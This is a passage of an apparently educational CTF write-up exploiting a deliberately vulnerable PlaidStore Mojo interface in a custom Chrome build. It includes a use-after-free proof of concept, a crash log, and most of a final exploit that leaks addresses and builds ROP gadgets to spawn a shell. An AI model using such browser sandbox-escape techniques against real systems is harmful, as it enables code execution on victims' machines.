class="number">0xdeadbeef</span>);</span></span><br><span class="line"><span class="language-javascript">                <span class="comment">// create a PlaidStoreImpl instance for the parent iframe</span></span></span><br><span class="line"><span class="language-javascript">                <span class="keyword">var</span> 
parentPlaidStorePtr = <span class="keyword">new</span> blink.<span class="property">mojom</span>.<span class="title class_">PlaidStorePtr</span>();</span></span><br><span class="line"><span class="language-javascript">                <span class="title class_">Mojo</span>.<span class="title function_">bindInterface</span>(</span></span><br><span class="line"><span class="language-javascript">                    blink.<span class="property">mojom</span>.<span class="property">PlaidStore</span>.<span class="property">name</span>,</span></span><br><span class="line"><span class="language-javascript">                    mojo.<span class="title function_">makeRequest</span>(parentPlaidStorePtr).<span class="property">handle</span>,</span></span><br><span class="line"><span class="language-javascript">                    <span class="string">&quot;context&quot;</span>,</span></span><br><span class="line"><span class="language-javascript">                    <span class="literal">true</span>);</span></span><br><span class="line"><span class="language-javascript">                <span class="comment">// free the child iframe</span></span></span><br><span class="line"><span class="language-javascript">                <span class="variable language_">document</span>.<span class="property">body</span>.<span class="title function_">removeChild</span>(frame);</span></span><br><span class="line"><span class="language-javascript">                frame.<span class="title function_">remove</span>();</span></span><br><span class="line"><span class="language-javascript">                <span class="comment">// allocate many chunks to reclaim the freed memory</span></span></span><br><span class="line"><span class="language-javascript">                <span class="keyword">for</span> (<span class="keyword">let</span> i = <span class="number">0</span>; i &lt; <span class="number">100</span>; i++)</span></span><br><span class="line"><span class="language-javascript">                    <span class="comment">// 
the storeData key must change on every iteration; otherwise each call just refills the same memory region over and over</span></span></span><br><span class="line"><span class="language-javascript">                    parentPlaidStorePtr.<span class="title function_">storeData</span>(<span class="string">&quot;1&quot;</span> + i, <span class="keyword">new</span> <span class="title class_">Uint8Array</span>(buf));</span></span><br><span class="line"><span class="language-javascript">                <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">&quot;try to uaf crash&quot;</span>);</span></span><br><span class="line"><span class="language-javascript">                <span class="comment">// try to trigger a crash through the UAF</span></span></span><br><span class="line"><span class="language-javascript">                childPlaidStorePtr.<span class="title function_">getData</span>(<span class="string">&quot;aaaa&quot;</span>, <span class="number">0x28</span>);</span></span><br><span class="line"><span class="language-javascript">            &#125;);</span></span><br><span class="line"><span class="language-javascript">        &#125;</span></span><br><span class="line"><span class="language-javascript">    </span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">head</span>&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="tag">&lt;<span class="name">body</span> <span class="attr">onload</span>=<span class="string">pwn()</span>&gt;</span><span class="tag">&lt;/<span class="name">body</span>&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="tag">&lt;/<span class="name">html</span>&gt;</span></span><br></pre></td></tr></table></figure><blockquote><p>Note, however, that this PoC does not <strong>pass one end of the <code>child iframe</code>'s Mojo pipe to the <code>parent iframe</code></strong>. Debugging shows that after the <code>child 
iframe</code> is removed, its <code>PlaidStoreImpl</code> instance still exists; <strong>it is not destroyed when the Mojo pipe is closed.</strong></p><p>The exact reason is not yet clear, but it does simplify the exploit.</p></blockquote><p>As the screenshot below shows, Chrome crashes at the call to <code>RenderFrameHostImpl::IsRenderFrameLive</code>, with <code>$rax</code> holding the target value <code>0xdeadbeef</code>.</p><p><img src="/2020/10/mojo/UAFPoc.png" alt="img"></p><p>The log output is as follows:</p><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span 
class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Kiprey @ Kipwn in /usr/class/CTFs/mojo [14:34:16] C:1</span></span><br><span class="line">$ ./chrome --headless --disable-gpu --remote-debugging-port=1338 --user-data-dir=./userdata --enable-blink-features=MojoJS,MojoJSTest http://localhost:8000/test.html</span><br><span class="line"></span><br><span class="line">DevTools listening on ws://127.0.0.1:1338/devtools/browser/2aaa5e8e-c088-4b7a-ab69-5dfbace58413</span><br><span class="line">127.0.0.1 - - [09/Oct/2020 14:36:39] <span class="string">&quot;GET /test.html HTTP/1.1&quot;</span> 200 -</span><br><span class="line">[1009/143639.113334:INFO:CONSOLE(14)] <span class="string">&quot;iframe loaded&quot;</span>, <span class="built_in">source</span>: about:srcdoc (14)</span><br><span class="line">[1009/143639.114060:INFO:CONSOLE(32)] <span class="string">&quot;parent iframe start working&quot;</span>, <span class="built_in">source</span>: http://localhost:8000/test.html (32)</span><br><span class="line">[1009/143639.168655:INFO:CONSOLE(54)] <span class="string">&quot;try to uaf crash&quot;</span>, <span class="built_in">source</span>: http://localhost:8000/test.html (54)</span><br><span class="line">Received signal 11 SEGV_MAPERR 0000deadc04f</span><br><span class="line"><span class="comment">#0 0x559d6e9c1579 base::debug::CollectStackTrace()</span></span><br><span class="line"><span class="comment">#1 0x559d6e9256f3 base::debug::StackTrace::StackTrace()</span></span><br><span class="line"><span class="comment">#2 0x559d6e9c1120 base::debug::(anonymous namespace)::StackDumpSignalHandler()</span></span><br><span class="line"><span class="comment">#3 0x7f62fcda4520 (/usr/lib/x86_64-linux-gnu/libpthread-2.29.so+0x1351f)</span></span><br><span class="line"><span class="comment">#4 0x559d6cf2e2d4 content::PlaidStoreImpl::GetData()</span></span><br><span 
class="line"><span class="comment">#5 0x559d6c901e3a blink::mojom::PlaidStoreStubDispatch::AcceptWithResponder()</span></span><br><span class="line"><span class="comment">#6 0x559d6cf2e9c6 blink::mojom::PlaidStoreStub&lt;&gt;::AcceptWithResponder()</span></span><br><span class="line"><span class="comment">#7 0x559d6eaf5878 mojo::InterfaceEndpointClient::HandleValidatedMessage()</span></span><br><span class="line"><span class="comment">#8 0x559d6eafbcf1 mojo::internal::MultiplexRouter::ProcessIncomingMessage()</span></span><br><span class="line"><span class="comment">#9 0x559d6eafb4de mojo::internal::MultiplexRouter::Accept()</span></span><br><span class="line"><span class="comment">#10 0x559d6eaf2e9c mojo::Connector::DispatchMessage()</span></span><br><span class="line"><span class="comment">#11 0x559d6eaf3941 mojo::Connector::ReadAllAvailableMessages()</span></span><br><span class="line"><span class="comment">#12 0x559d6eb0bd48 mojo::SimpleWatcher::OnHandleReady()</span></span><br><span class="line"><span class="comment">#13 0x559d6e96dbeb base::TaskAnnotator::RunTask()</span></span><br><span class="line"><span class="comment">#14 0x559d6e97e47e base::sequence_manager::internal::ThreadControllerWithMessagePumpImpl::DoWorkImpl()</span></span><br><span class="line"><span class="comment">#15 0x559d6e97e211 base::sequence_manager::internal::ThreadControllerWithMessagePumpImpl::DoSomeWork()</span></span><br><span class="line"><span class="comment">#16 0x559d6e93b817 base::(anonymous namespace)::WorkSourceDispatch()</span></span><br><span class="line"><span class="comment">#17 0x7f62fc08af1d g_main_context_dispatch</span></span><br><span class="line"><span class="comment">#18 0x7f62fc08b1a0 (/usr/lib/x86_64-linux-gnu/libglib-2.0.so.0.6200.4+0x5019f)</span></span><br><span class="line"><span class="comment">#19 0x7f62fc08b22f g_main_context_iteration</span></span><br><span class="line"><span class="comment">#20 0x559d6e93b672 
base::MessagePumpGlib::Run()</span></span><br><span class="line"><span class="comment">#21 0x559d6e97ecf9 base::sequence_manager::internal::ThreadControllerWithMessagePumpImpl::Run()</span></span><br><span class="line"><span class="comment">#22 0x559d6e956942 base::RunLoop::Run()</span></span><br><span class="line"><span class="comment">#23 0x559d6cca71f4 content::BrowserMainLoop::RunMainMessageLoopParts()</span></span><br><span class="line"><span class="comment">#24 0x559d6cca90a2 content::BrowserMainRunnerImpl::Run()</span></span><br><span class="line"><span class="comment">#25 0x559d731c5f78 headless::HeadlessContentMainDelegate::RunProcess()</span></span><br><span class="line"><span class="comment">#26 0x559d6e50e306 content::ContentMainRunnerImpl::RunServiceManager()</span></span><br><span class="line"><span class="comment">#27 0x559d6e50dff7 content::ContentMainRunnerImpl::Run()</span></span><br><span class="line"><span class="comment">#28 0x559d6e55c8d3 service_manager::Main()</span></span><br><span class="line"><span class="comment">#29 0x559d6e50c351 content::ContentMain()</span></span><br><span class="line"><span class="comment">#30 0x559d6e55b49d headless::(anonymous namespace)::RunContentMain()</span></span><br><span class="line"><span class="comment">#31 0x559d6e55b19b headless::HeadlessShellMain()</span></span><br><span class="line"><span class="comment">#32 0x559d6bfcdc27 ChromeMain</span></span><br><span class="line"><span class="comment">#33 0x7f62faaf9bbb __libc_start_main</span></span><br><span class="line"><span class="comment">#34 0x559d6bfcda6a _start</span></span><br><span class="line">  r8: 000030791a93d600  r9: 00007ffeb987a3b8 r10: 0000000000000000 r11: 0000000000000000</span><br><span class="line"> r12: 0000000000000028 r13: 0000000000000028 r14: 00007ffeb9879de0 r15: 00007ffeb9879dd0</span><br><span class="line">  di: 000030791a9c5100  si: 00007ffeb9879de0  bp: 00007ffeb9879d60  bx: 000030791aa58ba0</span><br><span class="line">  dx: 
0000000000000028  ax: 00000000deadbeef  cx: 00007ffeb9879dd0  sp: 00007ffeb9879d10</span><br><span class="line">  ip: 0000559d6cf2e2d4 efl: 0000000000010202 cgf: 002b000000000033 erf: 0000000000000004</span><br><span class="line"> trp: 000000000000000e msk: 0000000000000000 cr2: 00000000deadc04f</span><br><span class="line">[end of stack trace]</span><br><span class="line">Calling _exit(1). Core file will not be generated.</span><br></pre></td></tr></table></figure></li></ul><h2 id="6-exploit">6. exploit</h2><p>To sum up, the overall exploit flow is as follows:</p><ul><li><p>First create a <code>child iframe</code> and use the OOB read to leak the <strong>pointer</strong> stored in that <code>child iframe</code>'s <code>PlaidStoreImpl::render_frame_host_</code> and the <strong>base address</strong> of the <code>chrome</code> ELF. Then return these two addresses, together with the address of any <code>PlaidStoreImpl</code> instance, to the <code>parent iframe</code>.</p><blockquote><p>Note: it is <strong>best not to free</strong> the <code>child iframe</code> right away. Keep the <code>render_frame_host_</code> memory alive for now and free it only just before triggering the bug, to <strong>reduce the risk of the target memory being claimed by other code</strong>.</p></blockquote></li><li><p>Use the ELF base address leaked by the <code>child iframe</code> to work out the addresses of the gadgets.</p></li><li><p>Use JS code to carefully build the gadget payload.</p></li><li><p>Hand the <code>remote</code> end of the Mojo pipe held by the <code>child iframe</code> over to the <code>parent iframe</code>.</p><blockquote><p>The earlier UAF PoC skipped this step and still succeeded, so this step is not required for the exploit.</p></blockquote></li><li><p><strong>Free</strong> the <code>child iframe</code> and call the <code>parent iframe</code>'s <code>PlaidStoreImpl::StoreData</code> <strong>many times</strong> to write the <strong>gadget payload</strong> into memory.</p></li><li><p>Call the <code>child iframe</code>'s <code>PlaidStoreImpl::GetData</code>.</p></li><li><p>Get a <code>shell</code>!</p></li></ul><p>Putting the PoCs above together, the final exploit looks like this:</p><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span 
class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span 
class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span 
class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br><span class="line">168</span><br><span class="line">169</span><br><span class="line">170</span><br><span class="line">171</span><br><span class="line">172</span><br><span class="line">173</span><br><span class="line">174</span><br><span class="line">175</span><br><span class="line">176</span><br><span class="line">177</span><br><span class="line">178</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">html</span>&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="tag">&lt;<span class="name">head</span>&gt;</span></span><br><span class="line">    <span class="comment">&lt;!-- These JS files must be included in the HTML before calling the MojoJS interfaces --&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">script</span> <span class="attr">src</span>=<span 
class="string">&quot;mojo_js/mojo/public/js/mojo_bindings.js&quot;</span>&gt;</span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">script</span> <span class="attr">src</span>=<span class="string">&quot;mojo_js/third_party/blink/public/mojom/plaidstore/plaidstore.mojom.js&quot;</span>&gt;</span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">function</span> <span class="title function_">success</span>(<span class="params">msg</span>) &#123;</span></span><br><span class="line"><span class="language-javascript">            <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">&#x27;[+] &#x27;</span> + msg);</span></span><br><span class="line"><span class="language-javascript">            <span class="comment">/*</span></span></span><br><span class="line"><span class="comment"><span class="language-javascript">                Avoid assigning to document.body.innerText directly here:</span></span></span><br><span class="line"><span class="comment"><span class="language-javascript">                doing so removes every node currently under body,</span></span></span><br><span class="line"><span class="comment"><span class="language-javascript">                including the child iframe added with appendChild</span></span></span><br><span class="line"><span class="comment"><span class="language-javascript">            */</span></span></span><br><span class="line"><span class="language-javascript">            <span class="keyword">var</span> elem = <span class="variable language_">document</span>.<span class="title function_">getElementById</span>(<span class="string">&quot;parentLog&quot;</span>);</span></span><br><span 
class="line"><span class="language-javascript">            <span class="keyword">if</span>(elem == <span class="literal">undefined</span>) &#123;</span></span><br><span class="line"><span class="language-javascript">                elem = <span class="variable language_">document</span>.<span class="title function_">createElement</span>(<span class="string">&quot;div&quot;</span>);</span></span><br><span class="line"><span class="language-javascript">                elem.<span class="property">id</span> = <span class="string">&quot;parentLog&quot;</span>; <span class="comment">// so that later calls find and reuse this div</span></span></span><br><span class="line"><span class="language-javascript">                <span class="variable language_">document</span>.<span class="property">body</span>.<span class="title function_">appendChild</span>(elem);</span></span><br><span class="line"><span class="language-javascript">            &#125;</span></span><br><span class="line"><span class="language-javascript">            elem.<span class="property">innerText</span> += <span class="string">&#x27;[+] &#x27;</span> + msg + <span class="string">&#x27;\n&#x27;</span>;</span></span><br><span class="line"><span class="language-javascript">        &#125;</span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">function</span> <span class="title function_">dec2hex</span>(<span class="params">dec</span>) &#123;</span></span><br><span class="line"><span class="language-javascript">            <span class="keyword">return</span> <span class="string">&quot;0x&quot;</span> + dec.<span class="title function_">toString</span>(<span class="number">16</span>);</span></span><br><span class="line"><span class="language-javascript">        &#125;</span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">async</span> <span class="keyword">function</span> <span class="title function_">pwn</span>(<span class="params"></span>) &#123;</span></span><br><span class="line"><span class="language-javascript">            <span class="title function_">success</span>(<span 
class="string">&quot;try append child iframe&quot;</span>);</span></span><br><span class="line"><span class="language-javascript">            <span class="keyword">var</span> frame = <span class="variable language_">document</span>.<span class="title function_">createElement</span>(<span class="string">&quot;iframe&quot;</span>);</span></span><br><span class="line"><span class="language-javascript">            frame.<span class="property">srcdoc</span> = <span class="string">`</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">&lt;script src=&quot;mojo_js/mojo/public/js/mojo_bindings.js&quot;&gt;&lt;\/script&gt;</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">&lt;script src=&quot;mojo_js/third_party/blink/public/mojom/plaidstore/plaidstore.mojom.js&quot;&gt;&lt;\/script&gt;</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">&lt;script&gt;</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">    function dec2hex(dec) &#123;</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">        return &quot;0x&quot; + dec.toString(16);</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">    &#125;</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">    function bytes2DWORD(bytes) &#123;</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">        var value = 0;</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">        for (let i = 0; i &lt; 8; i++) &#123;</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">            value = value * 0x100 + bytes[7 - i];</span></span></span><br><span class="line"><span 
class="string"><span class="language-javascript">        &#125;</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">        return value;</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">    &#125;</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">    function success(msg) &#123;</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">        console.log(&#x27;[+] &#x27; + msg);</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">        var elem = document.getElementById(&quot;#childLog&quot;);</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">        if(elem == undefined)</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">        &#123;</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">            elem = document.createElement(&quot;div&quot;);</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">            document.body.appendChild(elem);</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">        &#125;</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">        document.body.innerText += &#x27;[+] &#x27; + msg + &#x27;\\n&#x27;;</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">    &#125;</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">    async function pwn() &#123;</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">        var try_size = 100;</span></span></span><br><span class="line"><span class="string"><span 
class="language-javascript">        var plaidStorePtrList = [];</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">        for (let i = 0; i &lt; try_size; i++) &#123;</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">            var plaidStorePtr = new blink.mojom.PlaidStorePtr();</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">            // Bind the plaidStore instance to a mojo pipe</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">            Mojo.bindInterface(</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">                blink.mojom.PlaidStore.name,</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">                mojo.makeRequest(plaidStorePtr).handle,</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">                &quot;context&quot;,</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">                true);</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">            await plaidStorePtr.storeData(&quot;aaaa&quot;, new Uint8Array(0x28).fill(0x30 + i));</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">            plaidStorePtrList.push(plaidStorePtr);</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">        &#125;</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">        var PlaidStore_vtable_addr = 0;</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">        var render_frame_host_addr = 0;</span></span></span><br><span class="line"><span 
class="string"><span class="language-javascript">        for (let i = 0; i &lt; try_size; i++) &#123;</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">            // Note: await each call here so that its result is available before it is inspected.</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">            // Get the value the promise resolves to</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">            let res = await plaidStorePtrList[i].getData(&quot;aaaa&quot;, 0x100);</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">            let data = res.data;</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">            for (let j = 0x28; j &lt; 0x100 - 0x8; j += 0x8) &#123;</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">                // Although what is returned is a string, it can still be treated directly as a hexadecimal number.</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">                var hex = bytes2DWORD(data.slice(j, j + 0x8));</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">                if ((hex &amp; 0xfff) == 0x7a0) &#123;</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">                    PlaidStore_vtable_addr = dec2hex(hex);</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">                    render_frame_host_addr = dec2hex(bytes2DWORD(data.slice(j + 0x8, j + 0x10)));</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">                    success(&quot;PlaidStore vtable: &quot; + PlaidStore_vtable_addr);</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">                    
success(&quot;render_frame_host: &quot; + render_frame_host_addr);</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">                    break;</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">                &#125;</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">            &#125;</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">            if (PlaidStore_vtable_addr != 0)</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">                break;</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">        &#125;</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">        if (PlaidStore_vtable_addr == 0)</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">            throw &quot;PlaidStore vtable addr leak failed!&quot;;</span></span></span><br><span class="line"><span class="string"><span class="language-javascript"></span></span></span><br><span class="line"><span class="string"><span class="language-javascript">        var chromeTextBase = PlaidStore_vtable_addr - 0x9fb67a0;</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">        success(&quot;chrome Text Base: &quot; + dec2hex(chromeTextBase));</span></span></span><br><span class="line"><span class="string"><span class="language-javascript"></span></span></span><br><span class="line"><span class="string"><span class="language-javascript">        window.plaidStorePtr = plaidStorePtrList[0];</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">        window.chromeTextBase = chromeTextBase;</span></span></span><br><span class="line"><span 
class="string"><span class="language-javascript">        window.render_frame_host_addr = render_frame_host_addr;</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">        success(&quot;iframe loaded&quot;);</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">    &#125;</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">&lt;\/script&gt;</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">`</span>;</span></span><br><span class="line"><span class="language-javascript">            <span class="variable language_">document</span>.<span class="property">body</span>.<span class="title function_">appendChild</span>(frame);</span></span><br><span class="line"><span class="language-javascript">            <span class="comment">// Run the frame's code asynchronously once the frame has finished loading</span></span></span><br><span class="line"><span class="language-javascript">            frame.<span class="property">contentWindow</span>.<span class="title function_">addEventListener</span>(<span class="string">&quot;DOMContentLoaded&quot;</span>, <span class="title function_">async</span> () =&gt; &#123;</span></span><br><span class="line"><span class="language-javascript">                <span class="title function_">success</span>(<span class="string">&quot;parent iframe start working&quot;</span>)</span></span><br><span class="line"><span class="language-javascript">                <span class="comment">// Wait for the JS code in the frame to finish running</span></span></span><br><span class="line"><span class="language-javascript">                <span class="keyword">await</span> frame.<span class="property">contentWindow</span>.<span class="title function_">pwn</span>();</span></span><br><span class="line"><span class="language-javascript">                <span class="keyword">var</span> childPlaidStorePtr = frame.<span class="property">contentWindow</span>.<span 
class="property">plaidStorePtr</span>;</span></span><br><span class="line"><span class="language-javascript">                <span class="keyword">var</span> childRenderFrameHost = <span class="built_in">parseInt</span>(frame.<span class="property">contentWindow</span>.<span class="property">render_frame_host_addr</span>);</span></span><br><span class="line"><span class="language-javascript">                <span class="keyword">var</span> chromeTextBase = <span class="built_in">parseInt</span>(frame.<span class="property">contentWindow</span>.<span class="property">chromeTextBase</span>);</span></span><br><span class="line"><span class="language-javascript">                <span class="comment">// Checking a single variable is enough to tell whether the iframe loaded successfully</span></span></span><br><span class="line"><span class="language-javascript">                <span class="keyword">if</span> (childPlaidStorePtr == <span class="literal">undefined</span> || childPlaidStorePtr == <span class="number">0</span>)</span></span><br><span class="line"><span class="language-javascript">                    <span class="keyword">throw</span> <span class="string">&quot;Error in iframe loading&quot;</span>;</span></span><br><span class="line"><span class="language-javascript">                <span class="comment">// Compute the addresses of the gadgets</span></span></span><br><span class="line"><span class="language-javascript">                <span class="keyword">var</span> xchg_addr = chromeTextBase + <span class="number">0x000000000880dee8</span>;</span></span><br><span class="line"><span class="language-javascript">                <span class="title function_">success</span>(<span class="string">&quot;xchg_addr: &quot;</span> + <span class="title function_">dec2hex</span>(xchg_addr));</span></span><br><span class="line"><span class="language-javascript">                <span class="keyword">var</span> pop_rdi_ret = chromeTextBase + <span class="number">0x0000000002e4630f</span>;</span></span><br><span class="line"><span 
class="language-javascript">                <span class="title function_">success</span>(<span class="string">&quot;pop_rdi_ret: &quot;</span> + <span class="title function_">dec2hex</span>(pop_rdi_ret));</span></span><br><span class="line"><span class="language-javascript">                <span class="keyword">var</span> pop_rsi_ret = chromeTextBase + <span class="number">0x0000000002d278d2</span>;</span></span><br><span class="line"><span class="language-javascript">                <span class="title function_">success</span>(<span class="string">&quot;pop_rsi_ret: &quot;</span> + <span class="title function_">dec2hex</span>(pop_rsi_ret));</span></span><br><span class="line"><span class="language-javascript">                <span class="keyword">var</span> pop_rdx_ret = chromeTextBase + <span class="number">0x0000000002e9998e</span>;</span></span><br><span class="line"><span class="language-javascript">                <span class="title function_">success</span>(<span class="string">&quot;pop_rdx_ret: &quot;</span> + <span class="title function_">dec2hex</span>(pop_rdx_ret));</span></span><br><span class="line"><span class="language-javascript">                <span class="keyword">var</span> pop_rax_ret = chromeTextBase + <span class="number">0x0000000002e651dd</span>;</span></span><br><span class="line"><span class="language-javascript">                <span class="title function_">success</span>(<span class="string">&quot;pop_rax_ret: &quot;</span> + <span class="title function_">dec2hex</span>(pop_rax_ret));</span></span><br><span class="line"><span class="language-javascript">                <span class="keyword">var</span> syscall_addr = chromeTextBase + <span class="number">0x0000000002ef528d</span>;</span></span><br><span class="line"><span class="language-javascript">                <span class="title function_">success</span>(<span class="string">&quot;syscall_addr: &quot;</span> + <span class="title 
